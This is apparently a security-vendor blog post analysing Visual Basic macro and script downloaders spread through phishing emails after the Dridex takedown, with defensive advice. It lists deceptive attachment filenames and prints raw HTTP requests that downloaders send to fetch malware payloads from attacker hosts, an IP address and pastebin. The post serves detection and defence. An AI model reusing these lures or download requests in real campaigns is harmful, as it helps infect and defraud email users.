Macros Galore

Spear_Email_2_grey

The recent FBI announcement of the Dridex botnet take-down and the arrest of its administrator doesn’t mean email users will see the last of Dridex. We might see the reuse of similar phishing tactics with future malware. We have seen an overall slowdown in Dridex in recent months ever since its first noticeable Dridex campaigns in early 2015. However, throughout October we have observed a rise in the use phishing documents with embedded macros used as first stage macro downloaders such as Banload. We shouldn’t lose sight of successful social engineering and evasion methods used by this botnet just because it was taken down.

What Does a Macro Downloader Do?

These campaigns are multistage downloaders whose typical infiltration methods consist of social engineered emails that contain disguised attachments. Attachments typically consist of file types that allow the execution of embedded Visual Basic (VB)code, including Visual Basic script (.vbs) files, VBScript Encoded (.vbe) files, and Microsoft Office documents with embedded Visual Basic macros. When the code executes, it contacts a server to download and execute the malware payload. This method has frequently been used to install malware such as Dridex, Dyre, and Banload. Figure 1 illustrates the downloader concept.

Figure 1. The concept of the downloader

Email Body

Figure 2. An example of a phishing email

The phishing emails focus on convincing the user to download and open the attachments; Figure 2 shows an example. Attachment names usually correspond to the email subject and include a randomized number at the end of the file name. Spam campaign themes often refer to picture and movie files, government documents, potentially sensitive information such as court papers, resumes, and shipment orders. Here are a few file names used in recent campaigns:

    Mirian_resume_1700.doc
    ACH_Payment_0067855YKwcod..vbs
    remit network report.pdf.vbs
    adam.champion_OK_5072.doc
    marketing.it_GO_1793.doc
    ian.marchant_QR_4940.doc
    janetcard_FE700F.xls
    2via_Boleto_Ref-01237.vbs
    DSC283751726313.vbs
    MOV90472251.vbs
    Proposta_comercial00734133.vbs
    Rendimentos1827349154.vbs
    pendencias01726324.vbe
    comunicado01726315.vbe
    SolicitaÆo_de_2¦_via_Boleto_pdf.vbe
    Arquivo_Comprovante_deposito0128971256.vbe

Microsoft Office documents containing macros are often password protected, while VBS/VBE files are obfuscated beyond readability, as shown in Figure 3. Both methods may allow the files to evade antivirus detection. VBS and VBE files will execute immediately upon opening, as will Office macros if the victim has macros enabled. Otherwise, the victim will receive a prompt asking if they want to run the macro.

Figure 3. Dridex ActiveMime

Figure 4. Obfuscated VisualBasic script (.vbs) file

HTTP Request Variation

The downloaders make HTTP GET or HTTP POST requests to retrieve the malware payload. However, as shown in Figure 4, the details of the request vary widely across samples. This makes it harder to create network-based signatures and helps the downloader avoid detection. Notice in Example 2 below that the “GET” request uses a double “EE.”

Example 1

GET /01/hits.html HTTP/1.1
Connection: Keep-Alive
Content-Type: text/plain; Charset=UTF-8
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: sfgbfhysf.systemy1201.in

Example 2

GEET /bt/bt/sp_index.php HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; InfoPath.2)
Host: 136.243.219.233
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache

Example 3

POST /download.php?i=V8XHfsL1 HTTP/1.1
Accept: */*Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Host: pastebin.com
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache

Unique Malicious VBS/VBE Since August 2015

Even after the announcement of the Dridex botnet take-down, we are still seeing the use of Visual Basic downloaders. In Figure 5, the red area represents the number of unique hashes seen by FireEye, while the blue area represents the portion seen by open source malware repositories. The average lag time is 47 hours between when a sample was first seen by FireEye and when it was first seen in the open source repository.

Figure 5. First Seen Fireeye vs. Open Source Repository

Figure 6. Distribution of Malware Based on File Types

Malicious VBS/VBE Downloaders Seen Across Various Industries

Spam campaigns, by their nature, are broad-based and generally have no specific target. However, this also means that they can potentially impact any organization. Figure 7 shows that campaigns involving VBS/VBE downloaders are seen across numerous industries. Some industries may also have fortified their networks with well-known anti-virus solutions; however, it’s the beauty of dynamic and generic detection that catches the first instance of malware.

Figure 7. Distribution of VBS/VBE downloaders across industries

How to Avoid Future Dridex-like Malware?

FireEye recommends:

  • Always confirm the identity or source of the email.
  • Verify that attachment file extensions reflect the actual file type.
  • Modify security policies to disable the use of macros.
  • Educate users to disable or implement macro security in Office applications.
  • Consider a detection system that has the ability to detect multistage malware in phishing and spam campaigns, like the FireEye Email Security Solution.

[1] https://www.fbi.gov/pittsburgh/press-releases/2015/bugat-botnet-administrator-arrested-and-malware-disabled